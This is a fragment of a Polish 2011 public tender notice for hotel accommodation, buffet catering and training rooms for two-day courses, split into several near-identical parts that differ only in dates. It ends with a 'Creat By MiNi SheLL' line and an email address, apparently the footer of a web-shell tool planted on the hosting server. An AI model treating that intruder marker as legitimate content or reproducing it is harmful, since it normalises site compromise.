<li>2. Ilość gwiazdek - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.Zorganizowanie pobytu uczestników 5 szkoleń  2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 10 pokoi 2 osobowych, 10 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 9.00 pierwszego dnia pobytu i trwa do godz.15.00 drugiego dnia pobytu.
1.1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.1.5.1.Obiad w formie bufetu(w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
zupa (minimum dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) :
danie na ciepło (3 do wyboru)
sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
przystawki (wybór zimnych przekąsek mięsnych i rybnych)
wędliny (różnorodne, minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe) 
warzywa (świeże i konserwowe)
pieczywo (różnorodne- jasne, ciemne, bagietki)
napoje: kawa (różnorodna-z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.1.5.3.Śniadanie w formie bufetu (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
wędliny (różnorodne- minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe)
dżemy
jajka
płatki śniadaniowe, muesli
mleko (ciepłe i zimne)
jogurty
świeże owoce
pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
przystawki (wybór zimnych przekąsek mięsnych, rybnych)
zupa (dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.6.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną: z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną: czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sali szkoleniowej.
1.1.7.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.1.8.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.1.9.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.1.10.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.1.11.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.1.12.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi).
2.Termin wykonania zamówienia: 24-25 marzec 2011r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość gwaizdek - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.Zorganizowanie pobytu uczestników 5 szkoleń  2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 10 pokoi 2 osobowych, 10 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 9.00 pierwszego dnia pobytu i trwa do godz.15.00 drugiego dnia pobytu.
1.1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.1.5.1.Obiad w formie bufetu(w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
zupa (minimum dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) :
danie na ciepło (3 do wyboru)
sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
przystawki (wybór zimnych przekąsek mięsnych i rybnych)
wędliny (różnorodne, minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe) 
warzywa (świeże i konserwowe)
pieczywo (różnorodne- jasne, ciemne, bagietki)
napoje: kawa (różnorodna-z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.1.5.3.Śniadanie w formie bufetu (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
wędliny (różnorodne- minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe)
dżemy
jajka
płatki śniadaniowe, muesli
mleko (ciepłe i zimne)
jogurty
świeże owoce
pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
przystawki (wybór zimnych przekąsek mięsnych, rybnych)
zupa (dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.6.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną: z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną: czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sali szkoleniowej.
1.1.7.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.1.8.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.1.9.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.1.10.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.1.11.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.1.12.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi).
2.Termin wykonania zamówienia: 19-20 maj 2011r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość gwiazdek - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.Zorganizowanie pobytu uczestników 5 szkoleń  2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 10 pokoi 2 osobowych, 10 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 9.00 pierwszego dnia pobytu i trwa do godz.15.00 drugiego dnia pobytu.
1.1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.1.5.1.Obiad w formie bufetu(w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
zupa (minimum dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) :
danie na ciepło (3 do wyboru)
sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
przystawki (wybór zimnych przekąsek mięsnych i rybnych)
wędliny (różnorodne, minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe) 
warzywa (świeże i konserwowe)
pieczywo (różnorodne- jasne, ciemne, bagietki)
napoje: kawa (różnorodna-z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.1.5.3.Śniadanie w formie bufetu (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
wędliny (różnorodne- minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe)
dżemy
jajka
płatki śniadaniowe, muesli
mleko (ciepłe i zimne)
jogurty
świeże owoce
pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
przystawki (wybór zimnych przekąsek mięsnych, rybnych)
zupa (dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.6.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną: z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną: czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sali szkoleniowej.
1.1.7.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.1.8.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.1.9.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.1.10.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.1.11.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.1.12.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi).
2.Termin wykonania zamówienia: 8-9 wrzesień 2011r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość gwiazdek - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.Zorganizowanie pobytu uczestników 5 szkoleń  2 - dniowych, obejmujących nocleg i całodzienne wyżywienie oraz wynajęcie sal szkoleniowych.
1.1.1.Grupy szkoleniowe składać się będą z 30 osób (2 grupy po  15 osób)
1.1.2.Wykonawca zobowiązany jest do zabezpieczenia bazy noclegowej w obiekcie hotelarskim o standardzie minimum 3 gwiazdek: 10 pokoi 2 osobowych, 10 pokoi 1 osobowych oraz zarezerwowania 2 pokoi 1 osobowych wolnych dla osób prowadzących szkolenia w danym terminie.
1.1.3.Pokoje powinny być wyposażone w pełny węzeł sanitarny i telewizor oraz powinny mieć zapewniony bezpłatny dostęp do internetu (wi-fi). Temperatura w pokojach nie może być niższa niż 21 stopni Celsjusza (klimatyzacja z możliwością indywidualnej regulacji).
1.1.4.Zakwaterowanie w pokojach rozpoczyna się od godz. 9.00 pierwszego dnia pobytu i trwa do godz.15.00 drugiego dnia pobytu.
1.1.5.Wykonawca zobowiązany jest do zapewnienia  wyżywienia dla uczestników szkoleń,obejmującego:
1 dnia: 
1.1.5.1.Obiad w formie bufetu(w ilości adekwatnej do liczby uczestników): 
przystawki (wybór zimnych przekąsek mięsnych, rybnych oraz świeżych sałatek)
zupa (minimum dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna z expresu, rozpuszczalna, capuccino, latte)
herbata ( różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.2.Kolacja w formie bufetu (w ilości adekwatnej do liczby uczestników) :
danie na ciepło (3 do wyboru)
sałatki 3 rodzaje (np. makaronowa, grecka, gyros)
przystawki (wybór zimnych przekąsek mięsnych i rybnych)
wędliny (różnorodne, minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe) 
warzywa (świeże i konserwowe)
pieczywo (różnorodne- jasne, ciemne, bagietki)
napoje: kawa (różnorodna-z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna- czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
2 dnia: 
1.1.5.3.Śniadanie w formie bufetu (w ilości adekwatnej do liczby uczestników) :
posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
wędliny (różnorodne- minimum 5 rodzai)
sery (różnorodne- żółte, pleśniowe, białe)
dżemy
jajka
płatki śniadaniowe, muesli
mleko (ciepłe i zimne)
jogurty
świeże owoce
pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.5.4.Obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
przystawki (wybór zimnych przekąsek mięsnych, rybnych)
zupa (dwie do wyboru)
dania na ciepło (cztery do wyboru, w tym jedno wegetariańskie)
dodatki (ziemniaki, frytki, ryż, makaron)
surówki (minimum trzy do wyboru)
desery (minimum dwa do wyboru, np. np. ciasta, musy, owoce, lody, galaretki)
napoje: kawa (różnorodna: z expresu, rozpuszczalna, capuccino, latte)
herbata (różnorodna: czarna, zielona, owocowa)
woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje)
napoje bezalkoholowe gazowane (minimum trzy rodzaje)
1.1.6.Serwis kawowy powinien być dostępny dla uczestników szkoleń od momentu zakwaterowania przez cały czas trwania zajęć. Serwis powinien być uzupełniany na bieżąco. Serwis obejmuje: kawę (różnorodną: z expresu, rozpuszczalną, capuccino, latte), herbatę (różnorodną: czarną, zieloną, owocową), wodę (gazowaną i niegazowaną), napoje bezalkoholowe gazowane (minimum 3 rodzaje), soki owocowe (minimum 3 rodzaje), ciasto, świeżo wypiekane ciastka o charakterze śniadaniowym (np. croissanty, mini bułeczki) ciastka deserowe, paluszki / krakersy, świeże owoce, cukier, mleko, śmietankę, cytrynę. Serwis kawowy powinien być umiejscowiony w sąsiedztwie sali szkoleniowej.
1.1.7.Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym zakwaterowani są uczestnicy szkolenia
1.1.8.Niedopuszczalne jest serwowanie posiłków w naczyniach jednorazowych.
1.1.9.Wykonawca zobowiązany jest zapewnić obsługę kelnerską adekwatną do liczby uczestników szkolenia.
1.1.10.Niedopuszczalne jest aby posiłki serwowano w tym samym pomieszczeniu, w którym będą odbywały się szkolenia.
1.1.11.Wykonawca zobowiązany jest zapewnić 2 oddzielne sale szkoleniowe (każda na 15 osób), do wyłącznej i całodziennej dyspozycji uczestników szkoleń. Sale szkoleniowe powinny znajdować się w tym samym obiekcie / kompleksie obiektów, w którym zakwaterowani są uczestnicy szkoleń.
1.1.12.Sale powinny spełniać wymogi bezpieczeństwa i higieny pracy w odniesieniu  do liczby uczestników szkoleń. Każda sala  powinna być klimatyzowana, z możliwością indywidualnej regulacji (w okresie zimowym temperatura nie może być niższa niż 21 stopni Celsjusza, nie dopuszcza się klimatyzatorów przenośnych), wyposażona w projektor multimedialny, laptop, flipchart z blokiem, markery oraz w odpowiednią ilość krzeseł dla wszystkich uczestników. Sale muszą mieć zapewniony bezpłatny dostęp do internetu (wi-fi).
2.Termin wykonania zamówienia: 13-14 paźdzernik 2011r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość gwiazdek - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com